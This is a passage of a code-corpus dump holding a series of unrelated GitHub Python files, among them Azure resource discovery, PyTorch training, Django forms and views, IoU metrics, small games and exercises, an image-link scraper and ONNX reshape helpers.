network_client.network_interfaces.get(vm_rg, ni_name)\n #print(json.dumps(net_interface.as_dict(), indent=4))\n # assume only 1 NIC\n ip_config = net_interface.ip_configurations[0]\n private_ip = ip_config.private_ip_address or ''\n public_ip = ''\n if ip_config.public_ip_address:\n pub_ip_reference = ip_config.public_ip_address.id.split('/')\n pub_ip_group = pub_ip_reference[4]\n pub_ip_name = pub_ip_reference[8]\n pub_ip = network_client.public_ip_addresses.get(pub_ip_group, pub_ip_name)\n #print(json.dumps(pub_ip.as_dict(), indent=4))\n public_ip = pub_ip.ip_address\n\n res_inst = IaasInstance(\n type = res_type,\n id = vm.id,\n name = vm.name,\n private_ip = private_ip,\n public_ip = public_ip\n )\n\n res_acct = IaasAccount('resource_group', vm_rg)\n res_regn = IaasRegion('location', vm_loc)\n\n res = IaasResource(\n provider = self._provider,\n account = res_acct,\n region = res_regn,\n instance = res_inst,\n tags = vm_tags\n )\n instances.append(res)\n\n return instances\n\n\n def list_lb(self):\n res_type = 'lb'\n network_client = NetworkManagementClient(self._credential, self._subscription_id)\n\n lb_list = network_client.load_balancers.list_all()\n\n instances: List[IaasResource] = list()\n for lb in list(lb_list):\n #print(json.dumps(lb.as_dict(), indent=4))\n lb_loc = lb.location\n lb_tags = lb.tags or dict()\n lb_reference = lb.id.split('/')\n lb_rg = lb_reference[4]\n\n # implement filtering\n if self._filter_by_resource_group != 'all' and self._filter_by_resource_group != lb_rg:\n continue \n if self._filter_by_location and self._filter_by_location != lb_loc:\n continue\n if self._filter_by_tag_name and not lb_tags.get(self._filter_by_tag_name):\n continue\n\n ip_config = lb.frontend_ip_configurations[0]\n private_ip = ip_config.private_ip_address or ''\n public_ip = ''\n if ip_config.public_ip_address:\n pub_ip_reference = ip_config.public_ip_address.id.split('/')\n pub_ip_group = pub_ip_reference[4]\n pub_ip_name = pub_ip_reference[8]\n pub_ip = network_client.public_ip_addresses.get(pub_ip_group, pub_ip_name)\n #print(json.dumps(pub_ip.as_dict(), indent=4))\n public_ip = pub_ip.ip_address\n\n res_ports = list()\n for lb_rule in list(lb.load_balancing_rules):\n res_ports.append(f'{lb_rule.frontend_port}/{lb_rule.protocol}')\n\n res_inst = IaasInstance(\n type = res_type,\n id = lb.id,\n name = lb.name,\n public_ip = public_ip,\n private_ip = private_ip,\n ports = res_ports\n )\n\n res_acct = IaasAccount('resource_group', lb_rg)\n res_regn = IaasRegion('location', lb_loc)\n\n res = IaasResource(\n provider = self._provider,\n account = res_acct,\n region = res_regn,\n instance = res_inst,\n tags = lb_tags\n )\n instances.append(res)\n\n return instances\n\n\nif __name__ == '__main__':\n azr = AzureController('all', None, 'banyan:discovery')\n my_vms = azr.list_vm()\n print(my_vms)\n my_lbs = azr.list_lb()\n print(my_lbs)\n\n","repo_name":"banyansecurity/pybanyan","sub_path":"banyan/ext/iaas/azure_cloud.py","file_name":"azure_cloud.py","file_ext":"py","file_size_in_byte":7166,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"18878743282","text":"import numpy as np \nimport torch\nimport torch.nn as nn \nimport torchvision.transforms as transforms\n# Other Library\nfrom datetime import datetime\n# Self-Defined Files\nimport Utils\nimport Config\nimport Recorder\n# Models\nimport AlexNet, ResNet, LeNet5, MobileNet, NiNet\nimport SqueezeNet, myNet\n\n# Recorder Instantiate\nmyRecorder = 
Recorder.Recorder()\ntorch.cuda.empty_cache()\n\n# Fetch Models, Init & Copy\n# model = ResNet.Fetch_ResNet('ResNet8v1')\n# model = AlexNet.AlexNet()\n# model = LeNet5.LeNet5()\n# model = MobileNet.MobileNetv1()\n# model = NiNet.NetworkInNetwork()\n# model = SqueezeNet.Fetch_SqueezeNet('Bypass_Simple')\n# model = SqueezeNet.SqueezeNet('Basic')\nmodel = myNet.myNet(ResidualDepth = 2, DepthShrink = 0.5)\n\n\n\n# print(model)\nprint(sum(p.numel() for p in model.parameters() if p.requires_grad))\n\n\nmodel.apply(Utils.weight_init)\nmyRecorder.add_record_('Model', model.model_name)\nmyRecorder.add_record_('Model Size Trainable', sum(p.numel() for p in model.parameters() if p.requires_grad))\nmyRecorder.add_record_('Model Size Total', sum(p.numel() for p in model.parameters()))\nmyRecorder.add_record_('Model Structure', [layer[2:] for layer in str(model).split('\\n')[1:-1]])\n\n\n# Define some Hyperparameters\nbatch_size = 128\ntotal_epoch = 350\ndevice = Utils.check_device()\nmodel.to(device)\nmyRecorder.add_record_('Batch Size', batch_size)\nmyRecorder.add_record_('Total Epoch', total_epoch)\nmyRecorder.add_record_('Device', str(device))\n\n# Loss Function\nlossFunc = nn.CrossEntropyLoss()\nmyRecorder.add_record_('Loss Function', str(lossFunc)[:-2])\n# Optimizer & Learning Rate Scheduler\noptim_dict = Config.Optimizer['SGD']\nscheduler_dict = Config.lr_Scheduler['MultiStepLR']\noptim, scheduler = Utils.optim_init(model, optim_dict, scheduler_dict)\nmyRecorder.add_record_('Optimizer', {'Type': optim_dict['optim_TYPE'],\n                                     'State': optim.state_dict()['state'],\n                                     'param_groups': optim.state_dict()['param_groups'][0]})\nmyRecorder.add_record_('lr Scheduler', {'Type': scheduler_dict['schedule_TYPE'],\n                                        'State': scheduler.state_dict()})\n\n# DataSet Fetch & Augmentation\nTrain_transform = transforms.Compose([transforms.RandomCrop(32, padding = 4),\n                                      transforms.RandomHorizontalFlip(),\n                                      transforms.ToTensor(),\n                                      transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261))])\nTest_transform = transforms.Compose([ transforms.ToTensor(),\n                                      transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261))])\nDataLoader, label = Utils.DatasetLoader('CIFAR10', Train_transform, Test_transform, batch_size, TrainShrink = 0.03125)\nmyRecorder.add_record_('TrainSet Size', 0.03125)\nmyRecorder.add_record_('Train Transform', [trans[4:] for trans in str(Train_transform).split('\\n')[1:-1]])\nmyRecorder.add_record_('Test Transform', [trans[4:] for trans in str(Test_transform).split('\\n')[1:-1]])\nmyRecorder.add_record_('Dataset', 'CIFAR10')\n\n\n# Starts Training\n# Record Start Time, this serves as time stamp for all the files stored\nTimeStamp = str(datetime.now())\nStartTime = datetime.now()\ntrain_acc, test_acc, loss = Utils.train(model, DataLoader, lossFunc, optim, device, total_epoch, scheduler)\nmyRecorder.add_record_('TrainingTime', str(datetime.now() - StartTime))\nStartTime = datetime.now()\nclass_prob, ConfuMx = Utils.fine_validate(model, DataLoader[1], device, label)\nmyRecorder.add_record_('InferenceTime', str(datetime.now() - StartTime))\nUtils.visualize_plt('../save/' + TimeStamp, train_acc, test_acc, loss)\nUtils.Save_Model(model, '../save/' + TimeStamp)\n# Save Config into JSON\nmyRecorder.add_record_('Performance', { 'Best_Train': max(train_acc), 'Final_Train': train_acc[-1],\n                                        'Best_Test' : max(test_acc), 'Final_Test': test_acc[-1],\n                                        'Best_Loss': min(loss), 'Final_Loss': loss[-1]})\nmyRecorder.add_record_('Class Performance', {label[i]: class_prob[i] for 
i in range(len(label))})\nmyRecorder.add_record_('Confusion Matrix', {label[i]: str(ConfuMx[i]) for i in range(len(label))})\n\n# Clean Up\nmyRecorder.json_dump_('../save/' + TimeStamp)\ntorch.cuda.empty_cache()\n","repo_name":"ChengyaoWang/PlayGround","sub_path":"PyTorchModels/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4623811892","text":"consoante = []  # consonants\nvogal = []  # vowels\nc = 0\nfor i in range(1,11):\n    x = str(input(\"Enter a letter: \"))\n    if len(x) >= 2:\n        print(\"I said a single letter\")\n        break\n    if x == 'a' or x == 'e' or x == 'i' or x == 'o' or x == 'u':\n        vogal.append(x)\n    else:\n        consoante.append(x)\n        c = c + 1  # count consonants only\nprint(\"The number of consonants is %i\"%c)\nprint(\"And the consonants are\")\nprint(consoante)\n","repo_name":"Davi-Augusto-Schmidt/Programas-e-exercicios","sub_path":"Python/4 - Exercicios com listas/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2922677244","text":"from django.forms import ModelForm\nfrom django import forms\nfrom billing.models import Product,Purchase,Order,OrderLines\n\nclass ProductCreateForm(ModelForm):\n    class Meta:\n        model=Product\n        fields=[\"product_name\"]\n\nclass PurchaseCreateForm(ModelForm):\n    class Meta:\n\n        model = Purchase\n        fields = [\"product\",\"qty\",\"purchase_price\",\"selling_price\"]\n        # widgets = {\"qty\": forms.TextInput(attrs={'class': 'form-control'})}\n        # widgets = {\"product\": forms.TextInput(attrs={'class': 'form-control'})}\n        # widgets = {\"purchase_price\": forms.TextInput(attrs={'class': 'form-control'})}\n\n\nclass OrderCreateForm(ModelForm):\n    billnumber = forms.CharField(widget=forms.TextInput(attrs={'readonly': 'readonly'}))\n    class Meta:\n        model = Order\n        fields = [\"billnumber\",\"customer_name\",\"phone_number\"]\n\nclass OrderlinesCreateForm(forms.Form):\n    # fields = [\"bill_number\",\"product_name\",\"product_qty\"]\n    bill_number = forms.CharField(widget=forms.TextInput(attrs={'readonly': 'readonly'}))\n    # bill_number=forms.CharField()\n    queryset = Purchase.objects.all().filter(qty__gte=1).values_list('product__product_name', flat=True)\n\n    choices = [(name, name) for name in queryset]\n\n    product_name=forms.ChoiceField(choices=choices,required=False,widget=forms.Select())\n    product_qty=forms.IntegerField()\n\n    class Meta:\n        model=OrderLines\n        fields = [\"bill_number\", \"product_name\", \"product_qty\"]\n\n","repo_name":"Sibinvarghese/GroceryBillingSystem","sub_path":"billing/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38810628975","text":"from typing import Tuple, Optional\n\nimport numpy as np\n\n\ndef box_iou(\n    box_true: Tuple[float, float, float, float],\n    box_detection: Tuple[float, float, float, float]\n) -> Optional[float]:\n    \"\"\"\n    Compute Intersection over Union of two bounding boxes - `box_true` and `box_detection`. Both boxes are expected to be\n    tuples in `(x_min, y_min, x_max, y_max)` format.\n\n    Args:\n        box_true: `tuple` representing the ground-truth bounding box.\n        box_detection: `tuple` representing the detection bounding box.\n\n    Returns:\n        iou: `float` value between 0 and 1. 
`None` if union is equal to 0.\n\n    Example:\n    ```\n    >>> from onemetric.cv.utils.iou import box_iou\n\n    >>> iou = box_iou(\n    ...     box_true=(0., 0., 1., 1.),\n    ...     box_detection=(0.25, 0., 1.25, 1.)\n    ... )\n\n    >>> iou\n    ... 0.6\n    ```\n    \"\"\"\n    _validate_box(box=box_true)\n    _validate_box(box=box_detection)\n\n    x_min_true, y_min_true, x_max_true, y_max_true = box_true\n    x_min_detection, y_min_detection, x_max_detection, y_max_detection = box_detection\n\n    x_min = max(x_min_true, x_min_detection)\n    y_min = max(y_min_true, y_min_detection)\n    x_max = min(x_max_true, x_max_detection)\n    y_max = min(y_max_true, y_max_detection)\n\n    area_intersection = max(0.0, x_max - x_min) * max(0.0, y_max - y_min)\n    area_true = (x_max_true - x_min_true) * (y_max_true - y_min_true)\n    area_detection = (x_max_detection - x_min_detection) * (y_max_detection - y_min_detection)\n    area_union = area_true + area_detection - area_intersection\n\n    if area_union == 0:\n        return None\n\n    return area_intersection / area_union\n\n\n# Updated version of box_iou_batch from https://github.com/kaanakan/object_detection_confusion_matrix\n\n\ndef box_iou_batch(boxes_true: np.ndarray, boxes_detection: np.ndarray) -> np.ndarray:\n    \"\"\"\n    Compute Intersection over Union of two sets of bounding boxes - `boxes_true` and `boxes_detection`. Both sets of\n    boxes are expected to be in `(x_min, y_min, x_max, y_max)` format.\n\n    Args:\n        boxes_true: 2d `np.ndarray` representing ground-truth boxes. `shape = (N, 4)` where N is number of true objects.\n        boxes_detection: 2d `np.ndarray` representing detection boxes. `shape = (M, 4)` where M is number of detected objects.\n\n    Returns:\n        iou: 2d `np.ndarray` representing pairwise IoU of boxes from `boxes_true` and `boxes_detection`. `shape = (N, M)` where N is number of true objects and M is number of detected objects.\n\n    Example:\n    ```\n    >>> import numpy as np\n\n    >>> from onemetric.cv.utils.iou import box_iou_batch\n\n    >>> boxes_true = np.array([\n    ...     [0., 0., 1., 1.],\n    ...     [2., 2., 2.5, 2.5]\n    ... ])\n    >>> boxes_detection = np.array([\n    ...     [0., 0., 1., 1.],\n    ...     [2., 2., 2.5, 2.5]\n    ... ])\n    >>> iou = box_iou_batch(boxes_true=boxes_true, boxes_detection=boxes_detection)\n\n    >>> iou\n    ... np.array([\n    ...     [1., 0.],\n    ...     [0., 1.]\n    ... ])\n    ```\n    \"\"\"\n\n    _validate_boxes_batch(boxes_batch=boxes_true)\n    _validate_boxes_batch(boxes_batch=boxes_detection)\n\n    def box_area(box):\n        return (box[2] - box[0]) * (box[3] - box[1])\n\n    area_true = box_area(boxes_true.T)\n    area_detection = box_area(boxes_detection.T)\n\n    top_left = np.maximum(boxes_true[:, None, :2], boxes_detection[:, :2])\n    bottom_right = np.minimum(boxes_true[:, None, 2:], boxes_detection[:, 2:])\n\n    area_inter = np.prod(np.clip(bottom_right - top_left, a_min=0, a_max=None), 2)\n    return area_inter / (area_true[:, None] + area_detection - area_inter)\n\n\ndef mask_iou(mask_true: np.ndarray, mask_detection: np.ndarray) -> Optional[float]:\n    \"\"\"\n    Compute Intersection over Union of two masks - mask_true and mask_detection. Shapes of mask_true and\n    mask_detection should be identical. Both arrays are expected to be `np.uint8` type and contain binary values (0 or 1).\n\n    Args:\n        mask_true: 2d `np.ndarray` representing ground-truth mask.\n        mask_detection: 2d `np.ndarray` representing detection mask.\n\n    Returns:\n        iou: `float` value between 0 and 1. 
`None` if union is equal to 0.\n\n Example:\n ```\n >>> import numpy as np\n\n >>> from onemetric.cv.utils.iou import mask_iou\n\n >>> full_mask = np.ones((10, 10)).astype('uint8')\n >>> quarter_mask = np.zeros((10, 10)).astype('uint8')\n >>> quarter_mask[0:5, 0:5] = 1\n\n >>> iou = mask_iou(mask_true=full_mask, mask_detection=quarter_mask)\n\n >>> iou\n ... 0.25\n ```\n \"\"\"\n _validate_mask(mask=mask_true)\n _validate_mask(mask=mask_detection)\n\n if mask_true.shape != mask_detection.shape:\n raise ValueError(f\"mask_true and mask_detection should have equal shapes.\")\n\n area_intersection = (mask_true & mask_detection).astype('uint8')\n area_union = (mask_true | mask_detection).astype('uint8')\n\n if np.sum(area_union) == 0:\n return None\n\n return np.sum(area_intersection) / np.sum(area_union)\n\n\ndef _validate_box(box: Tuple[float, float, float, float]):\n if type(box) != tuple or len(box) != 4 or box[0] >= box[2] or box[1] >= box[3]:\n raise ValueError(\n f\"Bounding box must be defined as four elements tuple: (x_min, y_min, x_max, y_max), \"\n f\"where x_min < x_max and y_min < y_max. {box} given.\"\n )\n\n\ndef _validate_boxes_batch(boxes_batch: np.ndarray):\n if type(boxes_batch) != np.ndarray or len(boxes_batch.shape) != 2 or boxes_batch.shape[1] != 4:\n raise ValueError(\n f\"Bounding boxes batch must be defined as 2d np.array with (N, 4) shape, {boxes_batch} given\"\n )\n\n\ndef _validate_mask(mask: np.ndarray):\n if type(mask) != np.ndarray or mask.dtype != 'uint8' or len(mask.shape) != 2 or mask.min() < 0 or mask.max() > 1:\n raise ValueError(\n f\"Mask must be defined as 2d np.array with np.uint8 type and binary values (0/1). {mask} given.\"\n )\n","repo_name":"SkalskiP/onemetric","sub_path":"onemetric/cv/utils/iou.py","file_name":"iou.py","file_ext":"py","file_size_in_byte":5920,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"21"} +{"seq_id":"5926831583","text":"from tkgpio import TkCircuit\n\n# initialize the circuit inside the GUI\n\nconfiguration = {\n \"width\": 300,\n \"height\": 200,\n \"lcds\": [\n {\"x\": 30, \"y\": 40, \"name\": \"LCD\", \"pins\":[2, 3, 4, 5, 6, 7], \"columns\": 16, \"lines\": 2}\n ],\n \"buttons\": [\n {\"x\": 30, \"y\": 130, \"name\": \"Press to toggle LED 2\", \"pin\": 11},\n ]\n}\n\ncircuit = TkCircuit(configuration)\n@circuit.run\ndef main ():\n \n # now just write the code you would use in a real Raspberry Pi\n \n from gpiozero import LED, Button\n from time import sleep\n from Adafruit_CharLCD import Adafruit_CharLCD\n \n \n lcd = Adafruit_CharLCD(2, 3, 4, 5, 6, 7, 16, 2)\n \n global count\n count = 0\n \n \n def show_next_characters():\n global count\n \n print(f\"Showing characters from code {count} to {count+31}\")\n \n string = \"\"\n for i in range(0, 32):\n string += chr(count)\n if i == 15:\n string += \"\\n\"\n count += 1\n \n lcd.clear()\n lcd.message(string)\n \n button = Button(11)\n button.when_pressed = show_next_characters\n \n show_next_characters()\n \n \n while True:\n sleep(0.1)\n","repo_name":"wallysalami/tkgpio","sub_path":"docs/examples/test_LCD.py","file_name":"test_LCD.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"21"} +{"seq_id":"37429429736","text":"import random\n# v 1.0\n\"\"\"This program plays a game of Rock, Paper, Scissors between two Players,\nand reports both Player's scores each round.\"\"\"\n\nmoves = ['rock', 'paper', 'scissors']\n\n\"\"\"The Player class is the 
parent class for all of the Players\nin this game\"\"\"\n\n\nclass Player:\n    def __init__(self):\n        self.my_previous_move = random.choice(moves)\n        self.their_previous_move = random.choice(moves)\n\n    def move(self):\n        return 'rock'\n\n    def learn(self, my_move, their_move):\n        self.my_previous_move = my_move\n        self.their_previous_move = their_move\n\n\nclass Random_Player(Player):\n    def move(self):\n        return random.choice(moves)\n\n\nclass Human_Player(Player):\n    def move(self):\n        self.hand = input(\"What will you play?\" +\n                          \" Rock, Paper or Scissors?\\n\").lower()\n        if self.hand in moves:\n            return self.hand\n        else:\n            print(\"Not a valid move\")\n            return self.move()\n\n\nclass Reflect_Player(Player):\n    def move(self):\n        return self.their_previous_move\n\n\nclass Cycle_Player(Player):\n    def move(self):\n        n = moves.index(self.my_previous_move)\n        if n == 2:\n            return moves[0]\n        else:\n            return moves[n+1]\n\n\nclass Game:\n    def __init__(self, p1, p2):\n        self.p1 = p1\n        self.p2 = p2\n        self.p1.score = 0\n        self.p2.score = 0\n\n    def play_round(self):\n        move1 = self.p1.move()\n        move2 = self.p2.move()\n        print(f\"Player 1: {move1}  Player 2: {move2}\")\n        self.beats(move1, move2)\n        self.p1.learn(move1, move2)\n        self.p2.learn(move2, move1)\n\n    def post_game(self):\n        print(f\"Final score P1: {self.p1.score}, P2: {self.p2.score}\")\n        if self.p1.score > self.p2.score:\n            print(f\"Player 1 Wins with {self.p1.score} points!\\n\")\n        elif self.p1.score < self.p2.score:\n            print(f\"Player 2 Wins with {self.p2.score} points!\\n\")\n        elif self.p1.score == self.p2.score:\n            print(\"TIE BREAKER ROUND!!\")\n            self.play_round()\n            self.post_game()\n\n    def play_again(self):\n        another = input(\"play another 3 rounds or quit? quit/play?\\n\").lower()\n        if another == \"play\":\n            self.play_game()\n        elif another == \"quit\":\n            print(\"Game over!\")\n        else:\n            print(\"invalid command\")\n            self.play_again()\n\n    def play_game(self):\n        print(\"Game start!\")\n        for round in range(3):\n            print(f\"P1: {self.p1.score}, P2: {self.p2.score}\")\n            print(f\"Round {round + 1}:\")\n            self.play_round()\n        self.post_game()\n        self.play_again()\n\n    def beats(self, move1, move2):\n        if move1 == move2:\n            print(\"This round is a tie, no winner \\n\")\n        elif move1 == 'rock':\n            if move2 == 'scissors':\n                self.p1.score += 1\n                print(\"Player 1 wins this round \\n\")\n            else:\n                self.p2.score += 1\n                print(\"Player 2 wins this round \\n\")\n        elif move1 == 'scissors':\n            if move2 == 'paper':\n                self.p1.score += 1\n                print(\"Player 1 wins this round \\n\")\n            else:\n                self.p2.score += 1\n                print(\"Player 2 wins this round \\n\")\n        elif move1 == 'paper':\n            if move2 == 'rock':\n                self.p1.score += 1\n                print(\"Player 1 wins this round\\n\")\n            else:\n                self.p2.score += 1\n                print(\"Player 2 wins this round \\n\")\n\n\nif __name__ == '__main__':\n    game = Game(Human_Player(), Random_Player())\n    game.play_game()\n","repo_name":"hamjahb/rock-paper-scisors","sub_path":"rock paper scisors.py","file_name":"rock paper scisors.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70533303732","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 06 11:18:32 2016\n\n@author: Ferriss\n\nConvert .CSV files of polarized FTIR measurements of untreated Kunlun and \nJaipur diopside to tab-delimited txt file appropriate for upload to the \nPULI database, http://puli.mfgi.hu\nFirst column: wavenumber\nSecond column: absorbances\nNormalized to cm\n\nWavenumber range 2500-4000 cm-1 following the example on the 
PULI website.\n\n\"\"\"\n\nimport cpx_spectra as sp\nimport numpy as np\nimport csv\n#import matplotlib.pyplot as plt\nimport pynams.pynams \n\nreload(pynams)\nreload(sp)\n\nKunlun_list = [sp.ave_K6_Ea, sp.ave_K6_Eb, sp.ave_K6_Ec] \nJ2_list = [sp.J2_Ea, sp.J2_Eb, sp.J2_Ec] # My Jaipur diopside sample J2\n\nspec_list = J2_list + Kunlun_list\nname_list = ['Jaipur_diopside_Ea', 'Jaipur_diopside_Eb', 'Jaipur_diopside_Ec',\n             'Kunlun_diopside_Ea', 'Kunlun_diopside_Eb', 'Kunlun_diopside_Ec', ]\n\nwn_high_puli = 4000.\nwn_low_puli = 2500.\n\nfor idx, spec in enumerate(spec_list):\n    spec.divide_by_thickness()\n    idx_hi = (np.abs(spec.wn_full-wn_high_puli)).argmin()\n    idx_lo = (np.abs(spec.wn_full-wn_low_puli)).argmin()\n\n    wn_puli = spec.wn_full[idx_lo:idx_hi]\n    abs_puli = spec.abs_full_cm[idx_lo:idx_hi]\n    \n    fig, ax = spec.plot_spectrum(wn_xlim_left=wn_high_puli,\n                                 wn_xlim_right=wn_low_puli)\n    \n    filename = 'Ferriss_' + name_list[idx] + '_puli.txt'\n    \n    with open(filename, 'wb') as pulifile:\n        spamwriter = csv.writer(pulifile, dialect='excel-tab')\n        for idx_wn, wn in enumerate(wn_puli):\n            spamwriter.writerow([wn, abs_puli[idx_wn]])\n","repo_name":"EFerriss/HydrogenCpx","sub_path":"HydrogenCpx/puli_database_prep.py","file_name":"puli_database_prep.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73365958452","text":"# Express P/Q mod m \n\n# Input : p , q , m\n\n# Output: integer value representing P/Q modulo m\n\n# Note: the inverse of q is computed with Fermat's little theorem, pow(q, m-2, m),\n# which is only valid when m is prime; e.g. mod(1, 2, 7) == 4 since (2 * 4) % 7 == 1\n\ndef mod(p,q,m):\n    p = p % m \n    inv = pow(q, m-2, m)  # modular inverse of q\n    ans=(inv*p) % m\n    return ans","repo_name":"bhatnitish1998/aps-2020","sub_path":"pq-1 mod m.py","file_name":"pq-1 mod m.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15184649585","text":"from django.shortcuts import render\n\nfrom joblib import load\nmodel = load('./savedModels/learnandbuild.joblib')\n\ndef predictor(request):\n    if request.method == 'POST':\n        tenure = request.POST['tenure']\n        SeniorCitizen = request.POST['SeniorCitizen']\n        Contract = request.POST['Contract']\n        PaperlessBilling = request.POST['PaperlessBilling']\n        MonthlyCharges = request.POST['MonthlyCharges']\n        y_pred = model.predict([[ tenure\t,SeniorCitizen,\tContract\t,PaperlessBilling,\tMonthlyCharges]])\n        if y_pred[0] == 0:\n            y_pred = 'Not Churn'\n        elif y_pred[0] == 1:\n            y_pred = 'Churn'\n        else:\n            y_pred = 'Virginica'  # leftover from an iris template; unreachable for this binary churn model\n        return render(request, 'result.html', {'result' : y_pred})\n    return render(request, 'main.html')\n","repo_name":"Jatinyadav7362/Churn_Prediction","sub_path":"irisApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23031931127","text":"# without deque this fails efficiency test case 1; with deque it passes\nfrom collections import deque\ndef solution(people, limit):\n    answer = 0\n    people = deque(sorted(people))\n    while people :\n        if len(people) == 1 :\n            answer += 1\n            break\n        if people[0] + people[-1] <= limit :\n            people.pop()\n            people.popleft()\n        else :\n            people.pop()\n        answer += 1\n    return answer","repo_name":"seoyeon08/Algorithm_Study","sub_path":"programmers/Lev2/구명보트.py","file_name":"구명보트.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31327221139","text":"import requests, json\nfrom bs4 import BeautifulSoup\n\nresponse = requests.get('https://coloniae.space/static/mycolony_version.json')\n\nsoup = BeautifulSoup(response.text, features=\"html.parser\").text\n\nmycolonyversion = json.loads(soup)['mycolony_version']\n\nprint(mycolonyversion)\n\nimageslink = 'https://www.apewebapps.com/apps/my-colony/'+mycolonyversion+'/images/'\n\nresponse = requests.get(imageslink)\n\nsoup = BeautifulSoup(response.text, features=\"html.parser\")\n\nlinks = soup.find_all('a', href=True)\n\nwith open('linkslist.txt', 'w') as file:\n    for link in links:\n        if link['href'][-4:] in ['.png', '.svg']:\n            file.write(imageslink+link['href']+'\\n')\n\nprint('now run:')\nprint('wget -q -i linkslist.txt\\nfind . -name \"*.1\" -type f -delete')\n","repo_name":"ultimepipolo/coloniae-public","sub_path":"static/media/gametiles/get_links_list.py","file_name":"get_links_list.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19043957532","text":"import numpy as np\nimport torch\nimport torch.utils.data as data\nfrom torchvision import datasets, transforms\nimport os\nfrom PIL import Image, ImageOps\n\nclass KvasirSEG_Dataset(data.Dataset):\n\n    def __init__(self, root=None, dataset_type='train',cross='1', transform=None):\n        #self.h_image_size, self.w_image_size = image_size[0], image_size[1]\n        self.dataset_type = dataset_type\n        self.transform = transform\n        self.cross = cross\n\n        self.item_image = np.load(root + \"datamodel/{}_data_{}.npy\".format(self.dataset_type, self.cross)) \n        self.item_gt = np.load(root + \"datamodel/{}_label_{}.npy\".format(self.dataset_type, self.cross)) \n        print(np.bincount(self.item_gt.flatten())) \n\n\n    def __getitem__(self, index):\n        items_im = self.item_image\n        items_gt = self.item_gt\n        img_name = items_im[index]\n        label_name = items_gt[index]\n        label_name = np.where(label_name>200, 1, 0)\n\n        image = Image.fromarray(np.uint8(img_name))\n        mask = Image.fromarray(np.uint8(label_name))\n\n        #mask = np.eye(2)[mask]\n\n        if self.transform:\n            image, mask = self.transform(image, mask)\n\n        return image, mask\n\n    def __len__(self):\n        return len(self.item_image)\n\n\n\n","repo_name":"usagisukisuki/Adaptive_t-vMF_Dice_loss","sub_path":"Kvasir-SEG/mydataset.py","file_name":"mydataset.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"37937834352","text":"import numpy as np\nimport warnings\n\n\ndef merge_reshape_nodes(model):\n    \"\"\"\n    Version specific for 0.4.1 and 1.0.x\n    A sequence of constant-reshape nodes with consistent blob flow\n    corresponds to one holistic Reshape layer in caffe.\n    This method merges the nodes into one node corresponding\n    to that layer.\n    \"\"\"\n    import onnx\n\n    nodes = model.graph.node[:]\n    del model.graph.node[:]\n\n    idx = 0\n    while idx < len(nodes):\n        node = 
nodes[idx]\n if node.op_type != \"Constant\":\n model.graph.node.extend([node])\n idx += 1\n continue\n\n constant_node = node\n while idx < len(nodes):\n idx += 1\n if idx >= len(nodes):\n break\n node = nodes[idx]\n if node.op_type != \"Reshape\":\n model.graph.node.extend([constant_node])\n break\n reshape_node = node\n assert constant_node.output[0] in reshape_node.input\n reshape_node.input.remove(constant_node.output[0])\n\n constant_attributes = dict(\n zip(\n [attr.name for attr in constant_node.attribute],\n constant_node.attribute,\n )\n )\n shape = np.frombuffer(\n constant_attributes[\"value\"].t.raw_data, dtype=np.int64\n )\n reshape_node.attribute.add(\n ints=shape, name=\"shape\", type=onnx.AttributeProto.INTS\n )\n model.graph.node.extend([reshape_node])\n idx += 1\n break\n\n\ndef delete_reshape_nodes(model):\n\n nodes = model.graph.node[:]\n del model.graph.node[:]\n\n idx = 0\n while idx < len(nodes):\n if nodes[idx].op_type != \"Reshape\":\n\n model.graph.node.extend([nodes[idx]])\n idx += 1\n continue\n else:\n temp_idx = idx + 1\n repeat_mark = False\n repeat_nodes = []\n use_mark = False\n if temp_idx >= len(nodes):\n model.graph.node.extend([nodes[idx]])\n else:\n while temp_idx < len(nodes):\n if nodes[temp_idx].op_type == \"Reshape\":\n if nodes[idx].output[0] in nodes[temp_idx].input:\n repeat_nodes.append(nodes[temp_idx])\n repeat_mark = True\n else:\n if nodes[idx].output[0] in nodes[temp_idx].input:\n use_mark = True\n temp_idx += 1\n\n if repeat_mark == True and use_mark == False:\n for temp_node in repeat_nodes:\n temp_node.input[0] = nodes[idx].input[0]\n else:\n model.graph.node.extend([nodes[idx]])\n idx += 1\n","repo_name":"ModelTC/NART","sub_path":"python/nart/tools/pytorch/network_utils/reshape.py","file_name":"reshape.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"21"} +{"seq_id":"19095826113","text":"import json\n\nif __name__ == \"__main__\":\n with open(\"complex_ddi_residues.json\", \"r\") as handle:\n complex_residues = 